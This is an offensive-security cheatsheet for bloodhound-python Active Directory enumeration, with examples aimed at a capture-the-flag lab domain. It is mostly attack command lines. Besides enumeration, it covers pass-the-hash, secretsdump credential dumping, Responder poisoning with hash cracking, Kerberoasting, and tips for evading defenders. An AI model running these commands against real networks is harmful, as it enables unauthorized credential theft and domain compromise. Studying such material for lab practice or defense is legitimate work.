daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

bloodhound.md (18598B)


      1 ---
      2 title: "BloodHound"
      3 description: "BloodHound data collection and analysis with the Python ingestor plus cypher query patterns."
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: [active-directory, graph, enumeration]
      7 tools: [BloodHound, bloodhound-python]
      8 difficulty: intermediate
      9 updated: "2026-08-09"
     10 source: "repo:Active-Directory/BloodHound-Python_Cheatsheet.md"
     11 ---
     12 
     13 # BloodHound
     14 
     15 Remote Active Directory enumeration ingestor for BloodHound over LDAP.
     16 
     17 ## Overview
     18 
     19 **bloodhound-python** (aka BloodHound.py) is a Python-based ingestor that collects AD data remotely without executing code on Windows systems.
     20 
     21 Key features:
     22 
     23 - Remote enumeration from Linux
     24 - No code execution on target required
     25 - LDAP-based collection with multiple authentication methods
     26 - Kerberos support
     27 - Outputs JSON files for BloodHound
     28 
     29 ### When to Use bloodhound-python vs SharpHound
     30 
     31 | Scenario | Tool |
     32 |:---------|:-----|
     33 | Have valid AD credentials, attacking from Linux | bloodhound-python |
     34 | Have shell access on Windows machine | SharpHound |
     35 | Need session enumeration | SharpHound |
     36 | Remote enumeration only | bloodhound-python |
     37 | Need local admin rights detection | SharpHound |
     38 | Stealth is priority (no Windows execution) | bloodhound-python |
     39 
     40 > **Note —** For current BloodHound Community Edition (BHCE), use the `-v` legacy output or the maintained `bloodhound-ce-python` fork depending on your ingestor version; the collection flags shown here are unchanged.
     41 
     42 ## Installation
     43 
     44 ### Kali Linux
     45 
     46 ```bash
     47 # Usually pre-installed on Kali
     48 bloodhound-python --help
     49 
     50 # If not installed
     51 sudo apt update
     52 sudo apt install bloodhound.py
     53 ```
     54 
     55 ### Manual Installation (pip)
     56 
     57 ```bash
     58 # Install via pip
     59 pip3 install bloodhound
     60 
     61 # Or install from GitHub (latest version)
     62 git clone https://github.com/fox-it/BloodHound.py.git
     63 cd BloodHound.py
     64 pip3 install .
     65 
     66 # Verify installation
     67 bloodhound-python --version
     68 ```
     69 
     70 ### Dependencies
     71 
     72 ```bash
     73 # Required dependencies
     74 pip3 install dnspython ldap3 impacket
     75 
     76 # For Kerberos support
     77 sudo apt install krb5-user
     78 pip3 install pyasn1 pyasn1-modules
     79 ```
     80 
     81 ## Basic Usage
     82 
     83 ```bash
     84 # Basic enumeration with all collection methods
     85 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
     86 
     87 # With automatic ZIP creation
     88 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
     89 
     90 # Specify output directory
     91 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bloodhound
     92 
     93 # Custom collection name
     94 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --collectionmethod all
     95 ```
     96 
     97 ### Essential Parameters
     98 
     99 | Parameter | Description | Example |
    100 |:----------|:------------|:--------|
    101 | `-c, --collectionmethod` | Collection method(s) | `-c all` |
    102 | `-u, --username` | Username | `-u judith.mader` |
    103 | `-p, --password` | Password | `-p judith09` |
    104 | `-d, --domain` | Domain name | `-d certified.htb` |
    105 | `-ns, --nameserver` | Domain Controller IP | `-ns 10.10.11.41` |
    106 | `-dc, --domain-controller` | DC hostname | `-dc DC01.certified.htb` |
    107 
    108 ## Authentication Methods
    109 
    110 ### Method 1: Username & Password
    111 
    112 ```bash
    113 # Basic password authentication
    114 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    115 
    116 # With domain prefix
    117 bloodhound-python -c all -u certified.htb/judith.mader -p judith09 -ns 10.10.11.41
    118 
    119 # Using domain\username format
    120 bloodhound-python -c all -u 'certified.htb\judith.mader' -p judith09 -ns 10.10.11.41
    121 ```
    122 
    123 ### Method 2: NTLM Hash (Pass-the-Hash)
    124 
    125 ```bash
    126 # Using NTLM hash
    127 bloodhound-python -c all -u judith.mader --hashes :8846f7eaee8fb117ad06bdd830b7586c -d certified.htb -ns 10.10.11.41
    128 
    129 # With LM hash (usually empty)
    130 bloodhound-python -c all -u judith.mader --hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d certified.htb -ns 10.10.11.41
    131 
    132 # From secretsdump output
    133 bloodhound-python -c all -u administrator --hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41
    134 ```
    135 
    136 ### Method 3: Kerberos Authentication
    137 
    138 ```bash
    139 # Using Kerberos ticket
    140 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k
    141 
    142 # With ticket cache
    143 export KRB5CCNAME=/tmp/judith.ccache
    144 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --kerberos
    145 
    146 # Using AES key
    147 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 --aesKey <aes_key>
    148 ```
    149 
    150 ### Method 4: No Password (with .ccache file)
    151 
    152 ```bash
    153 # Set Kerberos ticket cache
    154 export KRB5CCNAME=/tmp/krb5cc_judith.mader
    155 
    156 # Run without password
    157 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --no-pass
    158 ```
    159 
    160 ### Method 5: Interactive Password Prompt
    161 
    162 ```bash
    163 # Prompt for password (no password in bash history)
    164 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41
    165 # Will prompt: Password:
    166 ```
    167 
    168 ## Collection Methods
    169 
    170 | Method | Collects |
    171 |:-------|:---------|
    172 | all | Everything below |
    173 | group | Groups and members |
    174 | localadmin | Local admin relationships |
    175 | session | Logged on users |
    176 | trusts | Trust relationships |
    177 | default | Group, LocalAdmin, Session, Trusts |
    178 | container | OUs and Containers |
    179 | psremote | PowerShell remoting access |
    180 | dcom | DCOM execution rights |
    181 | rdp | Remote Desktop access |
    182 | objectprops | Additional AD object properties |
    183 | acl | Access Control Lists |
    184 | loggedon | Currently logged on users |
    185 
    186 ```bash
    187 # All methods (most comprehensive)
    188 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    189 
    190 # Default methods only
    191 bloodhound-python -c default -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    192 
    193 # Specific single method
    194 bloodhound-python -c group -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    195 
    196 # Multiple specific methods
    197 bloodhound-python -c group,acl,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    198 
    199 # All except sessions (less noisy)
    200 bloodhound-python -c group,localadmin,trusts,acl,container,objectprops -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    201 ```
    202 
    203 Speed vs completeness:
    204 
    205 ```bash
    206 # Quick enumeration (fastest)
    207 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    208 
    209 # Comprehensive enumeration (slower but complete)
    210 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    211 
    212 # Stealth enumeration (LDAP only, no SMB)
    213 bloodhound-python -c group,acl,objectprops,container,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    214 ```
    215 
    216 ## Advanced Options
    217 
    218 ### Domain Controller Specification
    219 
    220 ```bash
    221 # Using IP address (nameserver)
    222 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    223 
    224 # Using hostname (domain controller)
    225 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb
    226 
    227 # Using FQDN
    228 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb -ns 10.10.11.41
    229 
    230 # Multiple DCs (will try in order)
    231 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41,10.10.11.42
    232 ```
    233 
    234 ### LDAP Configuration
    235 
    236 ```bash
    237 # Specify LDAP port (default: 389)
    238 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 389
    239 
    240 # Use LDAPS (secure LDAP, port 636)
    241 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636
    242 
    243 # Use Global Catalog port
    244 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 3268
    245 
    246 # Use GC-SSL
    247 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 3269
    248 
    249 # Disable LDAP signing/channel binding enforcement
    250 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 --disable-signing
    251 ```
    252 
    253 ### DNS Configuration
    254 
    255 ```bash
    256 # Force TCP for DNS queries
    257 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-tcp
    258 
    259 # Specify DNS timeout
    260 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-timeout 5
    261 ```
    262 
    263 ### Global Catalog Options
    264 
    265 ```bash
    266 # Use Global Catalog for queries
    267 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --global-catalog
    268 
    269 # Specify GC hostname
    270 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --gc dc01.certified.htb
    271 ```
    272 
    273 ### Computer/Host Enumeration
    274 
    275 ```bash
    276 # Exclude domain controllers from enumeration
    277 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --exclude-dcs
    278 
    279 # Custom computer filter (LDAP filter)
    280 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --computerfilter "(operatingSystem=*Server*)"
    281 ```
    282 
    283 ## Output Options
    284 
    285 ```bash
    286 # Default output (current directory)
    287 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41
    288 
    289 # Custom output directory
    290 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bloodhound_data
    291 
    292 # Specific output directory with ZIP
    293 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bh --zip
    294 ```
    295 
    296 Output files (without `--zip`):
    297 
    298 ```text
    299 20241127163045_computers.json
    300 20241127163045_users.json
    301 20241127163045_groups.json
    302 20241127163045_domains.json
    303 20241127163045_gpos.json
    304 20241127163045_ous.json
    305 20241127163045_containers.json
    306 ```
    307 
    308 With `--zip`: `20241127163045_bloodhound.zip` (contains all JSON files).
    309 
    310 ## Common Usage Scenarios
    311 
    312 ### Scenario 1: Initial Domain Enumeration
    313 
    314 ```bash
    315 # Quick initial recon
    316 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    317 
    318 # Save to specific location
    319 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o ~/htb/certified/bloodhound --zip
    320 ```
    321 
    322 ### Scenario 2: Stealth Enumeration (LDAP Only)
    323 
    324 ```bash
    325 # No SMB connections, LDAP queries only
    326 bloodhound-python -c group,acl,objectprops,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    327 
    328 # Minimize queries
    329 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    330 ```
    331 
    332 ### Scenario 3: After Obtaining Hash
    333 
    334 ```bash
    335 # Pass-the-hash attack
    336 bloodhound-python -c all -u administrator --hashes :32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 --zip
    337 
    338 # After secretsdump
    339 impacket-secretsdump certified.htb/judith.mader:judith09@10.10.11.41
    340 # Use extracted hash
    341 bloodhound-python -c all -u administrator --hashes :32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 --zip
    342 ```
    343 
    344 ### Scenario 4: Multi-Domain Environment
    345 
    346 ```bash
    347 # Enumerate parent domain
    348 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    349 
    350 # Enumerate child domain
    351 bloodhound-python -c all -u judith.mader -p judith09 -d child.certified.htb -ns 10.10.11.42 --zip
    352 
    353 # Enumerate trusted domain (if creds work)
    354 bloodhound-python -c all -u judith.mader -p judith09 -d external.local -ns 10.10.11.50 --zip
    355 ```
    356 
    357 ### Scenario 5: Kerberos Authentication
    358 
    359 ```bash
    360 # Get TGT first
    361 impacket-getTGT certified.htb/judith.mader:judith09
    362 
    363 # Set ticket cache
    364 export KRB5CCNAME=/tmp/judith.mader.ccache
    365 
    366 # Run bloodhound with Kerberos
    367 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --no-pass --zip
    368 ```
    369 
    370 ### Scenario 6: Through SOCKS Proxy
    371 
    372 ```bash
    373 # Set up proxy (e.g. with chisel)
    374 export HTTP_PROXY=socks5://127.0.0.1:1080
    375 export HTTPS_PROXY=socks5://127.0.0.1:1080
    376 
    377 # Or use proxychains
    378 proxychains bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    379 ```
    380 
    381 ### Scenario 7: Limited User Permissions
    382 
    383 ```bash
    384 # Low-privilege user - collect what you can
    385 bloodhound-python -c group,trusts -u lowpriv -p password123 -d certified.htb -ns 10.10.11.41 --zip
    386 ```
    387 
    388 ## SharpHound Comparison
    389 
    390 | Feature | bloodhound-python | SharpHound |
    391 |:--------|:-----------------|:-----------|
    392 | Platform | Linux/Remote | Windows/Local |
    393 | Execution | No code on target | Runs on target |
    394 | Sessions | Limited | Full |
    395 | Local Admin | Via LDAP | Direct query |
    396 | LDAP Data | Full | Full |
    397 | Groups | Full | Full |
    398 | ACLs | Full | Full |
    399 | GPOs | Full | Full |
    400 | Stealth | Better | More noisy |
    401 | Speed | Slower | Faster |
    402 
    403 bloodhound-python:
    404 
    405 ```bash
    406 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    407 ```
    408 
    409 SharpHound equivalent (on Windows as judith.mader):
    410 
    411 ```powershell
    412 .\SharpHound.exe -c All -d certified.htb --domaincontroller 10.10.11.41
    413 ```
    414 
    415 ## Troubleshooting
    416 
    417 ### "Could not resolve domain"
    418 
    419 ```bash
    420 # Add to /etc/hosts
    421 echo "10.10.11.41 certified.htb dc01.certified.htb" | sudo tee -a /etc/hosts
    422 
    423 # Use DC hostname
    424 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb -ns 10.10.11.41
    425 ```
    426 
    427 ### "Authentication failed"
    428 
    429 ```bash
    430 # Check credentials
    431 nxc smb 10.10.11.41 -u judith.mader -p judith09 -d certified.htb
    432 
    433 # Try different username formats
    434 bloodhound-python -c all -u 'certified.htb\judith.mader' -p judith09 -ns 10.10.11.41
    435 bloodhound-python -c all -u judith.mader@certified.htb -p judith09 -ns 10.10.11.41
    436 bloodhound-python -c all -u certified.htb/judith.mader -p judith09 -ns 10.10.11.41
    437 
    438 # Check for account lockout
    439 nxc ldap 10.10.11.41 -u judith.mader -p judith09 -d certified.htb
    440 ```
    441 
    442 ### "LDAP connection failed"
    443 
    444 ```bash
    445 # Try different LDAP port
    446 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 389
    447 
    448 # Try LDAPS
    449 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636
    450 
    451 # Disable signing
    452 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --disable-signing
    453 
    454 # Check connectivity
    455 nmap -p 389,636,3268,3269 10.10.11.41
    456 ```
    457 
    458 ### "DNS resolution failed"
    459 
    460 ```bash
    461 # Add DNS server to /etc/resolv.conf
    462 echo "nameserver 10.10.11.41" | sudo tee /etc/resolv.conf
    463 
    464 # Use --dns-tcp
    465 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-tcp
    466 ```
    467 
    468 ### "Kerberos authentication failed"
    469 
    470 ```bash
    471 # Check KRB5CCNAME and verify ticket
    472 echo $KRB5CCNAME
    473 klist
    474 
    475 # Get fresh ticket
    476 impacket-getTGT certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41
    477 export KRB5CCNAME=/tmp/judith.mader.ccache
    478 ```
    479 
    480 ### "Module not found"
    481 
    482 ```bash
    483 # Install dependencies
    484 pip3 install bloodhound dnspython ldap3 impacket
    485 
    486 # Or reinstall
    487 pip3 install --upgrade bloodhound
    488 ```
    489 
    490 ## Post-Collection
    491 
    492 ### Verify Output Files
    493 
    494 ```bash
    495 # Check generated files
    496 ls -lh *bloodhound* *_*.json
    497 
    498 # Verify JSON files
    499 for file in *.json; do
    500     echo "Checking $file"
    501     jq empty "$file" && echo "Valid JSON" || echo "Invalid JSON"
    502 done
    503 
    504 # Count objects in files
    505 echo "Users: $(jq '.users | length' *_users.json)"
    506 echo "Groups: $(jq '.groups | length' *_groups.json)"
    507 echo "Computers: $(jq '.computers | length' *_computers.json)"
    508 ```
    509 
    510 ### Import to BloodHound
    511 
    512 ```bash
    513 # Start Neo4j
    514 sudo neo4j start
    515 
    516 # Start BloodHound GUI
    517 bloodhound
    518 
    519 # Or use bloodhound-import (if available)
    520 bloodhound-import -f 20241127163045_bloodhound.zip
    521 ```
    522 
    523 ### Manual ZIP Creation
    524 
    525 ```bash
    526 zip bloodhound_certified.zip *_computers.json *_users.json *_groups.json *_domains.json *_gpos.json *_ous.json *_containers.json
    527 ```
    528 
    529 ## Chaining with Other Tools
    530 
    531 ```bash
    532 # 1. Enumerate domain users first
    533 nxc ldap 10.10.11.41 -u judith.mader -p judith09 -d certified.htb --users
    534 
    535 # 2. Run BloodHound
    536 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    537 
    538 # 3. Enumerate shares
    539 nxc smb 10.10.11.41 -u judith.mader -p judith09 -d certified.htb --shares
    540 
    541 # 4. Check for AS-REP roasting
    542 impacket-GetNPUsers certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request
    543 
    544 # 5. Kerberoasting
    545 impacket-GetUserSPNs certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request
    546 ```
    547 
    548 ### Automation Script
    549 
    550 ```bash
    551 #!/bin/bash
    552 # bloodhound_auto.sh
    553 
    554 DOMAIN="certified.htb"
    555 DC_IP="10.10.11.41"
    556 USERNAME="judith.mader"
    557 PASSWORD="judith09"
    558 OUTPUT_DIR="/tmp/bloodhound_$(date +%Y%m%d_%H%M%S)"
    559 
    560 echo "[+] Creating output directory: $OUTPUT_DIR"
    561 mkdir -p "$OUTPUT_DIR"
    562 
    563 echo "[+] Running BloodHound collection..."
    564 bloodhound-python -c all \
    565     -u "$USERNAME" \
    566     -p "$PASSWORD" \
    567     -d "$DOMAIN" \
    568     -ns "$DC_IP" \
    569     -o "$OUTPUT_DIR" \
    570     --zip
    571 
    572 echo "[+] Collection complete! Output saved to: $OUTPUT_DIR"
    573 ls -lh "$OUTPUT_DIR"
    574 ```
    575 
    576 ### From Responder/LLMNR Poisoning
    577 
    578 ```bash
    579 # 1. Capture credentials with Responder
    580 sudo responder -I tun0 -wv
    581 
    582 # 2. Crack the hash
    583 hashcat -m 5600 captured.hash /usr/share/wordlists/rockyou.txt
    584 
    585 # 3. Use credentials with BloodHound
    586 bloodhound-python -c all -u captured_user -p cracked_pass -d certified.htb -ns 10.10.11.41 --zip
    587 ```
    588 
    589 ## Operational Security
    590 
    591 ```bash
    592 # Minimal queries (stealthy)
    593 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    594 
    595 # Avoid computer enumeration (no SMB connections)
    596 bloodhound-python -c group,acl,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    597 
    598 # Use LDAPS for encryption
    599 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 --zip
    600 ```
    601 
    602 What defenders might see: LDAP queries from an unusual source, many LDAP binds in a short time, queries for sensitive attributes (adminCount, etc.), and SMB connections for session enumeration. Mitigate by using a compromised internal host as a jump box, spreading collection over time, and preferring SharpHound on a compromised Windows box when appropriate.
    603 
    604 ## Quick Reference Card
    605 
    606 ```bash
    607 # Standard enumeration
    608 bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP --zip
    609 
    610 # With hash
    611 bloodhound-python -c all -u USER --hashes :NTHASH -d DOMAIN -ns DC_IP --zip
    612 
    613 # With Kerberos
    614 export KRB5CCNAME=/tmp/ticket.ccache
    615 bloodhound-python -c all -u USER -d DOMAIN -ns DC_IP -k --no-pass --zip
    616 
    617 # Stealth mode
    618 bloodhound-python -c group,acl,trusts -u USER -p PASS -d DOMAIN -ns DC_IP --zip
    619 
    620 # Custom output
    621 bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP -o /tmp/bh --zip
    622 
    623 # Through proxy
    624 proxychains bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP --zip
    625 ```
    626 
    627 ## Resources
    628 
    629 - BloodHound.py GitHub: https://github.com/fox-it/BloodHound.py
    630 - BloodHound Documentation: https://bloodhound.readthedocs.io/
    631 - BloodHound GUI: https://github.com/BloodHoundAD/BloodHound
    632 - Custom Cypher Queries: https://github.com/hausec/Bloodhound-Custom-Queries